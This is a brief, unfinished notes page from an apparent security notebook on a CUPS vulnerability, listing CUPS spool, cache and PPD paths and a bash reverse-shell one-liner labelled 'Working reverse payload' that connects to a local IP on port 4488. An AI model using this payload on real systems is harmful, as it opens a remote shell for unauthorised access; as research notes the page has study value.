> For the complete documentation index, see [llms.txt](https://0xpthree.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xpthree.gitbook.io/notes/exploits-pocs/cups-cve-2024-47.md).

# CUPS - CVE-2024-47\*\*\*

In progress

```bash
## Notes
Print job: /var/spool/cups
Print info: /var/cache/cups
Executed jobs is found at: /etc/cups/ppd/<name>.ppd

## Working reverse payload 
'nohup bash -c "bash -I >& /dev/tcp/192.168.1.XX/4488 0>&1" &'
```
